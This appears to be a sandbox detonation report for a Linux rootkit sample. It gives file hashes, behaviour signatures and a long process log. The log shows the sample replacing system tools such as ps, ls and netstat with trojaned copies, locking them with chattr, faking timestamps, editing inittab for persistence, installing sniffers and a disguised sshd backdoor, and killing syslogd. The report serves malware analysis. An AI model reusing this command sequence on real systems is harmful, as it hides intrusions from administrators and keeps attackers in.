[mkdir /lib/libsh.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/libsh.so]

/bin/mkdir

[mkdir /usr/lib/libsh]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh]

/bin/mv

[mv .sh/* /lib/libsh.so/]

/bin/mv

[mv .sh/.bashrc /usr/lib/libsh]

/bin/mv

[mv /lib/libsh.so/sshd /sbin/ttyload]

/bin/chmod

[chmod a+xr /sbin/ttyload]

/bin/chmod

[chmod o-w /sbin/ttyload]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttyload]

/usr/bin/chattr

[chattr +isa /sbin/ttyload]

/bin/pidof

[pidof ttyload]

/bin/mv

[mv /tmp/bin/ttymon /sbin/ttymon]

/bin/chmod

[chmod a+xr /sbin/ttymon]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttymon]

/usr/bin/chattr

[chattr +isa /sbin/ttymon]

/bin/pidof

[pidof ttymon]

/bin/cp

[cp /bin/bash /lib/libsh.so]

/usr/bin/chattr

[chattr -isa /etc/inittab]

/bin/grep

[grep -v ttyload]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v getty]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep getty]

/bin/cat

[cat /tmp/.init2]

/usr/bin/touch

[touch -acmr /bin/ls /usr/sbin/ttyload]

/bin/chmod

[chmod +x /usr/sbin/ttyload]

/usr/bin/chattr

[chattr +isa /usr/sbin/ttyload]

/usr/sbin/ttyload

[/usr/sbin/ttyload]

/sbin/ttyload

[/sbin/ttyload -q]

/sbin/ttymon

[/sbin/ttymon]

/usr/bin/touch

[touch -amcr /etc/inittab /tmp/.init1]

/bin/mv

[mv -f /tmp/.init1 /etc/inittab]

/bin/rm

[rm -rf /tmp/.init2]

/bin/grep

[grep ttyload /etc/inittab]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ps]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ls]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/find]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/top]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/md5sum]

/tmp/encrypt

[./encrypt -e .shmd5 /dev/srd0]

/usr/bin/touch

[touch -acmr /bin/ls /dev/srd0]

/usr/bin/chattr

[chattr a+r /dev/srd0]

/bin/chown

[chown -f root:root /dev/srd0]

/bin/rm

[rm -rf .shmd5]

/usr/bin/touch

[touch -acmr /sbin/ifconfig ifconfig]

/usr/bin/touch

[touch -acmr /bin/ps ps]

/usr/bin/touch

[touch -acmr /bin/ls ls]

/usr/bin/touch

[touch -acmr /bin/netstat netstat]

/usr/bin/touch

[touch -acmr /usr/bin/find find]

/usr/bin/touch

[touch -acmr /usr/bin/top top]

/usr/bin/touch

[touch -acmr /usr/sbin/lsof lsof]

/usr/bin/touch

[touch -acmr /sbin/syslogd syslogd]

/usr/bin/touch

[touch -acmr /usr/bin/slocate slocate]

/usr/bin/touch

[touch -acmr /usr/bin/dir dir]

/usr/bin/touch

[touch -acmr /usr/bin/md5sum md5sum]

/usr/bin/touch

[touch -acmr /usr/bin/pstree pstree]

/bin/mkdir

[mkdir /usr/lib/libsh/.backup]

/usr/bin/chattr

[chattr -isa /bin/ps]

/bin/cp

[cp /bin/ps /usr/lib/libsh/.backup]

/bin/mv

[mv -f ps /bin/ps]

/usr/bin/chattr

[chattr +isa /bin/ps]

/usr/bin/chattr

[chattr -isa /sbin/ifconfig]

/bin/cp

[cp /sbin/ifconfig /usr/lib/libsh/.backup]

/bin/mv

[mv -f ifconfig /sbin/ifconfig]

/usr/bin/chattr

[chattr +isa /sbin/ifconfig]

/usr/bin/chattr

[chattr -isa /bin/netstat]

/bin/cp

[cp /bin/netstat /usr/lib/libsh/.backup]

/bin/mv

[mv -f netstat /bin/netstat]

/usr/bin/chattr

[chattr +isa /bin/netstat]

/usr/bin/chattr

[chattr -isa /usr/bin/top]

/bin/cp

[cp /usr/bin/top /usr/lib/libsh/.backup]

/bin/mv

[mv -f top /usr/bin/top]

/usr/bin/chattr

[chattr +isa /usr/bin/top]

/usr/bin/chattr

[chattr -isa /bin/ls]

/bin/cp

[cp /bin/ls /usr/lib/libsh/.backup]

/bin/mv

[mv -f ls /bin/ls]

/usr/bin/chattr

[chattr +isa /bin/ls]

/usr/bin/chattr

[chattr -isa /usr/bin/find]

/bin/cp

[cp /usr/bin/find /usr/lib/libsh/.backup]

/bin/mv

[mv -f find /usr/bin/find]

/usr/bin/chattr

[chattr +isa /usr/bin/find]

/usr/bin/chattr

[chattr -isa /usr/bin/pstree]

/bin/cp

[cp /usr/bin/pstree /usr/lib/libsh/.backup]

/bin/mv

[mv -f pstree /usr/bin/pstree]

/usr/bin/chattr

[chattr +isa /usr/bin/pstree]

/usr/bin/chattr

[chattr -isa /usr/bin/md5sum]

/bin/cp

[cp /usr/bin/md5sum /usr/lib/libsh/.backup]

/bin/mv

[mv -f md5sum /usr/bin/md5sum]

/usr/bin/chattr

[chattr +isa /usr/bin/md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz/*]

/bin/mv

[mv /tmp/utilz /usr/lib/libsh/]

/bin/mkdir

[mkdir /usr/lib/libsh/.sniff]

/bin/mv

[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]

/bin/mv

[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]

/bin/mv

[mv /tmp/bin/shsb /usr/lib/libsh/shsb]

/bin/mv

[mv /tmp/bin/hide /usr/lib/libsh/hide]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/shsb]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/hide]

/bin/chmod

[chmod +x /usr/lib/libsh/.sniff/*]

/bin/chmod

[chmod +x /usr/lib/libsh/shsb]

/bin/chmod

[chmod +x /usr/lib/libsh/hide]

/bin/ps

[ps aux]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep named]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep smbd]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep rpc.statd]

/bin/rm

[rm -rf /tmp/.procs]

/bin/cat

[cat /tmp/.stats]

/bin/grep

[grep 443]

/bin/grep

[grep http]

/bin/rm

[rm -rf /tmp/.stats]

/bin/mkdir

[mkdir /usr/lib/libsh/.owned]

/usr/bin/chattr

[chattr +isa /usr/lib/libsh]

/usr/bin/chattr

[chattr +isa /lib/libsh.so]

/usr/bin/killall

[killall -9 -q nscd]

/usr/bin/killall

[killall -9 -q xntps]

/usr/bin/killall

[killall -9 -q mountd]

/usr/bin/killall

[killall -9 -q mserv]

/usr/bin/killall

[killall -9 -q psybnc]

/usr/bin/killall

[killall -9 -q t0rns]

/usr/bin/killall

[killall -9 -q linsniffer]

/usr/bin/killall

[killall -9 -q sniffer]

/usr/bin/killall

[killall -9 -q lpsched]

/usr/bin/killall

[killall -9 -q sniff]

/usr/bin/killall

[killall -9 -q sn1f]

/usr/bin/killall

[killall -9 -q sshd2]

/usr/bin/killall

[killall -9 -q xsf]

/usr/bin/killall

[killall -9 -q xchk]

/usr/bin/killall

[killall -9 -q ssh2d]

/sbin/ifconfig

[/sbin/ifconfig eth0]

/bin/grep

[grep inet addr:]

/usr/bin/cut

[cut -c6-]

/usr/bin/awk

[awk -F {print $2} ]

/bin/hostname

[hostname -f]

/bin/uname

[uname -a]

/usr/bin/awk

[awk { print $11 }]

/bin/cat

[cat /tmp/info_tmp]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/usr/bin/awk

[awk {print $3}]

/bin/hostname

[hostname -i]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep eth]

/usr/bin/wc

[wc -l]

/usr/bin/head

[head -1 /etc/debian_version]

/bin/rm

[rm -rf /tmp/info_tmp]

/bin/date

[date +%S]

/usr/bin/expr

[expr 47 - 15]

/sbin/iptables

[/sbin/iptables -L input]

/usr/bin/head

[head -5]

/sbin/syslogd

[/sbin/syslogd -m 0]

/bin/rm

[rm -rf ../shv5*]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsel-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-3 udp

Files

/var/cache/ldconfig/aux-cache~

MD5 7b968c811ab74e54bd3a6edeaedb7fe4
SHA1 84b645300ab3cc1fae00e20d515835cc2f6425c8
SHA256 066ddcf734e62e679617b19fd043fb505f7bf1e9dcc99499a1538a23ac046ce9
SHA512 3013c678e554ab3bffc6fb1d7705b869c60f3608b45f586b9b6e12a6609e5fd659a0d341a646aefbef0a8e91d6c7d78b8adba24f1a6d6b61c362119201cf76cc

/etc/sh.conf

MD5 31ef5d48a40eb5163899bd3473a2c9ff
SHA1 60e30f7942e4da70afc9e4a38b134f0057d72092
SHA256 840cb83152de941a3a6d684fea05e24ceca557545341ca8d9794a1408554f552
SHA512 cd8ad33497eb3dd97bf884cd9d1c228f42b93364831ff945129acdd86b05fa79b09ca48a18c4993f78a3106638aec0e253350b727a535178778e94bd6b58050b

/lib/libsh.so/bash

MD5 ff888a762cf16272e430e01339a82159
SHA1 2aa621d5aad40292085f966fb58fd64c92f77781
SHA256 ee7e16d652d1c6ad490a8c5405a7196cd7081c541e6f81f6ed45e4987acf14ae
SHA512 421afe6b505c67e0753f0431caa0563dbe8ca29427a36c563226544c9d89dc6c38f6f788bc768854cd1b1ec39e7f08c3842441aa8eed4a865e6bb02197e2b2d0

/tmp/.init1

MD5 ba6ed6a3d425270d5374b0c2b54b3008
SHA1 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec
SHA256 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359
SHA512 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c

/tmp/.init1

MD5 0dae4739f83623a59236ecfabe00007b
SHA1 4b2b361ba9cf76213d2c4d6ba67e80099405f810
SHA256 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0
SHA512 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74

/tmp/.init1

MD5 21df30feebe94d25ce99e861e3642895
SHA1 3624439d7e9ac4463f83f1658205367ef27a2234
SHA256 d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5
SHA512 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb

/tmp/.init1

MD5 74e8461d4c9dd715082f15ef51e3ecac
SHA1 0504be0510ac79c4f7c8d5477032408f9b63a651
SHA256 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de
SHA512 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c

/tmp/.init1

MD5 8c053b4b674ebfcf6d38503608c5c8db
SHA1 9927d232e5bb15e3b6bbe461e0041d74649b963a
SHA256 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc
SHA512 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222

/usr/sbin/ttyload

MD5 b46702355aecfc0bd14c525655eccb8b
SHA1 85ae2258fdf63f04130470356e4d0ba13cce49b4
SHA256 d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7
SHA512 db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151

/usr/sbin/ttyload

MD5 53e75bf7964b0fb15cbe3028a151ed65
SHA1 116589e3b65166f73be2c6e8bb3b09c07641a762
SHA256 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805
SHA512 ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316

/tmp/.shmd5

MD5 eec7232ba4d5ca3a2eb8799c26a874fd
SHA1 c6e9b68130f82ab8b5c5355db53815dbfe10cda6
SHA256 1201688781c6ba66a453381af6ea1e639bdea07642772195a76b5c683b001a2c
SHA512 c8e23cac2324fd88dcb841a6175ae8e866c2bc8655aa7acd9db98e92b5a0856d9e026be7a26592d7b3acbed38a9c31b4b067fbe515600dac2ad01e51ea6faebc

/tmp/.shmd5

MD5 3511cf9f47b8905d2b9a331cd07f15d5
SHA1 8024660584a833ed071f4c05cb86b2705fb187b2
SHA256 7d7136b0834f12e5ae862511e4f6bdc655ee3f6648386b68bbb7e7fe3e8bfcc4
SHA512 7c60426f7b9e0f11fd4bdf767f8194b0d2ea262798cabf7e40d520baabf7ec963c403ec906e165f7fd245786b6830c2079148398fec76d3038eb4555856bf49f

/tmp/.shmd5

MD5 03ca2cd1e2d14b124a9a88d8124266d9
SHA1 f1d4faa755b0ac235fe86e530acdb3385604c692
SHA256 4b69279b67e2c5667eadb2f675e48f621dafea5e5889a61a6d861977b6b843b3
SHA512 8593d08285705ed5b44f0ca81b68fc9b18503a168ccda677cd063544c5939b9c135d3ad3f7eef8296305ecde03029e32b4d6b8ceb6bd85a723230b34704aed70

/tmp/.shmd5

MD5 14fe942e9e6a964a58c8078c44be033e
SHA1 61a772dfd7e9c8638c34e8779bb861b087d28f0f
SHA256 0a75bd4d0fb7b678d23edf9600fe2afd221d0a4ed7373d134b408cdeb0423c2a
SHA512 73459874ac59d34b95b43e2a17df819a43c983c752a73b26497d305f1d97c62be6b074e607362e4a8c3df59fa5cc0c8e58103878a8ca292c020663d2d9017cbd

/tmp/.shmd5

MD5 491e4be7ee03da344ef0369c79bdc148
SHA1 24374dfc09d9121f86fd9a2df2b0711a2518fd13
SHA256 8b0e0964567e00035e4ed334601488e6f618e2b0ab5133b1bcc6a51cba88116d
SHA512 9898bc7089452fcbe365a6b8ac0c8f9f2e5e90346fc56490f527c1ec559c65c9a9690ac7593c983f08658f0792f676e852ef5b62e735d3db1ea414d06b9849c2

/usr/lib/libsh/.backup/ps

MD5 7731870ca48e3c4e975b31faf2a7ba89
SHA1 e23c09034e8967cdbcacca35081798309ece06c8
SHA256 3ea8be1ed1173eaa225d37e5275f18a1e14bd4b20e1bdbd943a283da099849d2
SHA512 e046f20d8d2b4e60b36aa1e1da50d0c61df0771ea4aa85c4bd85d16fff8ffef4c641702d750b1d4e884d350cba6a6e1c2540d2a1de6ea37459fc7ed6a69e4b48

/usr/lib/libsh/.backup/top

MD5 09d15bc7f151effb4cd91a34973db447
SHA1 7a8bf06f56f3ed762e387eae5ea24175463180c9
SHA256 6f025fa3a97b0037bef8e95ae9e8040f4bb5dbac2fea19431c1456c6cbd0aaf9
SHA512 24040dfa79c81df8fb052b0525799ad2f9cdb312b5c480c7c11507c38ab8ece091ab81bcd56bc04ed09a2dabeccadad09f926f27a97fad8c80b6e99ba38fb0c1

/usr/lib/libsh/.backup/ls

MD5 7ca1e501765636270399488edd0e7d9c
SHA1 6ae05048996a56fc5142c6e96e6c01b12923e546
SHA256 8446452e20fb285524114fa4a2bbd87815e79dc8d3dff5ebb8fa676a5a1343d7
SHA512 a1c099c0da7065c59b9aa5f394a66ada208fb9a1d6a614c5536156b728273dbe41a0c79809891431cbb9737c79c325f8c8449c20a02dc0780fd444ee86e49677

/usr/lib/libsh/.backup/find

MD5 bb4edcad76062a76284c69f5fe4e50ea
SHA1 86055be4ce94fa3cffa9924e7b511e95df636606
SHA256 b7e25e128c130473f33c5135c78f591f35d7c4a7c5e1246c12eaa298db453474
SHA512 254acc62d2f83f5a4686adcf3fe6ad4697f392c288c5baa323830bb6f2466c303fd7bc9f237e98b2ca76bc3abb6b4c264e042be8c4291ae5cc21b2189d996521

/usr/lib/libsh/.backup/pstree

MD5 2c17377618ebb2190e5d6ad061bfdc25
SHA1 b6f51f2a8533f6e96f84a74512307049d8cfbc5f
SHA256 6f53043d6cff4c6fa296090037e0e7ffa5e844041f8a508c97d0434015b7c24e
SHA512 5a385ea98d16248bbb69a5b368f5a11349fbac4eadc73f172b0836676c47be02bc1fae64787fb07df9da7aeeecada5b34ee32de4eca0055db361b12c0d34dc75

/usr/lib/libsh/.backup/md5sum

MD5 49b825db57efc929fb6904b08db7ac69
SHA1 25e6f45827e620ad5eee782a91c12f7496098dc2
SHA256 3e3625089a3e524eec5e6750435be90b61cf0de283308c91b0b0f8cac3f6e592
SHA512 89f08142643c99bf8b5b053528a8d336360491aea0eeaf526f481a2702bc2fa0089567b9a7c6c59a549a72734e629287b14282fa0cd06d8df759fa94d04bb5be

/tmp/.procs

MD5 9c820866fe4cfc9df1c2797b381b07be
SHA1 cad618615fbcc26d4e9f206dc1d12f989b2bdc55
SHA256 dbcc843ddf5533b1a4f552f0c283030dcf168621a61f9d59eb6466165bc379ff
SHA512 503efab54d47f43b1823aa1029c18fda434fad96377c6913e0bf38eed9cad2d12f32379e2269c962c20bfd67c88619643f069c5e94738646b6266ad06b9a75ff

/tmp/info_tmp

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-15 23:17

Reported

2024-07-15 23:19

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

4s

Max time network

129s

Command Line

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /usr/sbin/ttyload /usr/sbin/ttyload N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/hostname N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/sbin/ttyload /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/600/stat /usr/bin/killall N/A
File opened for reading /proc/1296/cmdline /usr/bin/killall N/A
File opened for reading /proc/1499/cmdline /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/204/stat /usr/bin/killall N/A
File opened for reading /proc/115/stat /usr/bin/killall N/A
File opened for reading /proc/1500/stat /usr/bin/killall N/A
File opened for reading /proc/513/stat /usr/bin/killall N/A
File opened for reading /proc/1127/stat /bin/pidof N/A
File opened for reading /proc/512/status /bin/ps N/A
File opened for reading /proc/565/cmdline /usr/bin/killall N/A
File opened for reading /proc/1127/cmdline /usr/bin/killall N/A
File opened for reading /proc/777/cmdline /usr/bin/killall N/A
File opened for reading /proc/984/stat /usr/bin/killall N/A
File opened for reading /proc/1136/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/1296/stat /bin/pidof N/A
File opened for reading /proc/25/stat /bin/ps N/A
File opened for reading /proc/777/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/1305/cmdline /usr/bin/killall N/A
File opened for reading /proc/160/stat /usr/bin/killall N/A
File opened for reading /proc/204/cmdline /usr/bin/killall N/A
File opened for reading /proc/163/stat /usr/bin/killall N/A
File opened for reading /proc/1248/cmdline /usr/bin/killall N/A
File opened for reading /proc/166/stat /usr/bin/killall N/A
File opened for reading /proc/440/stat /usr/bin/killall N/A
File opened for reading /proc/1183/stat /usr/bin/killall N/A
File opened for reading /proc/174/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/1119/stat /usr/bin/killall N/A
File opened for reading /proc/1147/stat /usr/bin/killall N/A
File opened for reading /proc/992/stat /bin/pidof N/A
File opened for reading /proc/528/stat /bin/ps N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/442/cmdline /usr/bin/killall N/A
File opened for reading /proc/1144/stat /usr/bin/killall N/A
File opened for reading /proc/137/stat /usr/bin/killall N/A
File opened for reading /proc/984/cmdline /bin/pidof N/A
File opened for reading /proc/5/cmdline /bin/pidof N/A
File opened for reading /proc/161/stat /bin/pidof N/A
File opened for reading /proc/468/stat /usr/bin/killall N/A
File opened for reading /proc/83/stat /bin/pidof N/A
File opened for reading /proc/89/cmdline /bin/pidof N/A
File opened for reading /proc/1016/stat /usr/bin/killall N/A
File opened for reading /proc/1180/stat /usr/bin/killall N/A
File opened for reading /proc/159/stat /usr/bin/killall N/A
File opened for reading /proc/1310/status /bin/ps N/A
File opened for reading /proc/992/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/1142/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/174/stat /usr/bin/killall N/A
File opened for reading /proc/1068/cmdline /usr/bin/killall N/A
File opened for reading /proc/322/status /bin/ps N/A
File opened for reading /proc/468/stat /usr/bin/killall N/A
File opened for reading /proc/1284/cmdline /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/1058/stat /usr/bin/killall N/A
File opened for reading /proc/1505/cmdline /usr/bin/killall N/A
File opened for reading /proc/1182/cmdline /bin/pidof N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.stats /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/info_tmp /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/bin/.sh/sshd_config /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/conf/hosts.h /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init1 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init2 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.shmd5 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.procs /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Processes

/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

/usr/bin/whoami

[whoami]

/bin/tar

[tar zxf ./bin.tgz]

/bin/tar

[tar zxf ./conf.tgz]

/bin/tar

[tar zxf ./lib.tgz]

/bin/tar

[tar zxf ./utilz.tgz]

/bin/tar

[tar zxf ./sshd.tgz]

/bin/rm

[rm -rf ./sshd.tgz]

/bin/rm

[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]

/bin/sleep

[sleep 2]

/usr/bin/killall

[killall -9 syslogd]

/bin/date

[date +%S]

/bin/sleep

[sleep 2]

/bin/hostname

[hostname -f]

/usr/bin/cut

[cut -d @ -f 2]

/bin/grep

[grep @]

/bin/grep

[grep -v ^$]

/bin/grep

[grep -v ^# /etc/syslog.conf]

/bin/uname

[uname -n]

/bin/mv

[mv lib/libproc.a /lib/]

/bin/mv

[mv lib/libproc.so.2.0.6 /lib/]

/sbin/ldconfig

[/sbin/ldconfig]

/sbin/ldconfig.real

[/sbin/ldconfig.real]

/usr/bin/md5sum

[md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /etc/sh.conf]

/bin/chown

[chown -f root:root /etc/sh.conf]

/usr/bin/chattr

[chattr +isa /etc/sh.conf]

/bin/rm

[rm -rf /tmp/bin/.sh/shdcf2]

/bin/mv

[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]

/bin/mv

[mv /tmp/conf/lidps1.so /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/conf/*]

/bin/mv

[mv /tmp/conf/* /usr/include/]

/bin/mkdir

[mkdir /lib/libsh.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/libsh.so]

/bin/mkdir

[mkdir /usr/lib/libsh]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh]

/bin/mv

[mv .sh/* /lib/libsh.so/]

/bin/mv

[mv .sh/.bashrc /usr/lib/libsh]

/bin/mv

[mv /lib/libsh.so/sshd /sbin/ttyload]

/bin/chmod

[chmod a+xr /sbin/ttyload]

/bin/chmod

[chmod o-w /sbin/ttyload]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttyload]

/usr/bin/chattr

[chattr +isa /sbin/ttyload]

/bin/pidof

[pidof ttyload]

/bin/mv

[mv /tmp/bin/ttymon /sbin/ttymon]

/bin/chmod

[chmod a+xr /sbin/ttymon]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttymon]

/usr/bin/chattr

[chattr +isa /sbin/ttymon]

/bin/pidof

[pidof ttymon]

/bin/cp

[cp /bin/bash /lib/libsh.so]

/usr/bin/chattr

[chattr -isa /etc/inittab]

/bin/grep

[grep -v getty]

/bin/grep

[grep -v ttyload]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep getty]

/bin/cat

[cat /etc/inittab]

/bin/cat

[cat /tmp/.init2]

/usr/bin/touch

[touch -acmr /bin/ls /usr/sbin/ttyload]

/bin/chmod

[chmod +x /usr/sbin/ttyload]

/usr/bin/chattr

[chattr +isa /usr/sbin/ttyload]

/usr/sbin/ttyload

[/usr/sbin/ttyload]

/sbin/ttyload

[/sbin/ttyload -q]

/sbin/ttymon

[/sbin/ttymon]

/usr/bin/touch

[touch -amcr /etc/inittab /tmp/.init1]

/bin/mv

[mv -f /tmp/.init1 /etc/inittab]

/bin/rm

[rm -rf /tmp/.init2]

/bin/grep

[grep ttyload /etc/inittab]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ps]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ls]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/find]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/top]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/md5sum]

/tmp/encrypt

[./encrypt -e .shmd5 /dev/srd0]

/usr/bin/touch

[touch -acmr /bin/ls /dev/srd0]

/usr/bin/chattr

[chattr a+r /dev/srd0]

/bin/chown

[chown -f root:root /dev/srd0]

/bin/rm

[rm -rf .shmd5]

/usr/bin/touch

[touch -acmr /sbin/ifconfig ifconfig]

/usr/bin/touch

[touch -acmr /bin/ps ps]

/usr/bin/touch

[touch -acmr /bin/ls ls]

/usr/bin/touch

[touch -acmr /bin/netstat netstat]

/usr/bin/touch

[touch -acmr /usr/bin/find find]

/usr/bin/touch

[touch -acmr /usr/bin/top top]

/usr/bin/touch

[touch -acmr /usr/sbin/lsof lsof]

/usr/bin/touch

[touch -acmr /sbin/syslogd syslogd]

/usr/bin/touch

[touch -acmr /usr/bin/slocate slocate]

/usr/bin/touch

[touch -acmr /usr/bin/dir dir]

/usr/bin/touch

[touch -acmr /usr/bin/md5sum md5sum]

/usr/bin/touch

[touch -acmr /usr/bin/pstree pstree]

/bin/mkdir

[mkdir /usr/lib/libsh/.backup]

/usr/bin/chattr

[chattr -isa /bin/ps]

/bin/cp

[cp /bin/ps /usr/lib/libsh/.backup]

/bin/mv

[mv -f ps /bin/ps]

/usr/bin/chattr

[chattr +isa /bin/ps]

/usr/bin/chattr

[chattr -isa /sbin/ifconfig]

/bin/cp

[cp /sbin/ifconfig /usr/lib/libsh/.backup]

/bin/mv

[mv -f ifconfig /sbin/ifconfig]

/usr/bin/chattr

[chattr +isa /sbin/ifconfig]

/usr/bin/chattr

[chattr -isa /bin/netstat]

/bin/cp

[cp /bin/netstat /usr/lib/libsh/.backup]

/bin/mv

[mv -f netstat /bin/netstat]

/usr/bin/chattr

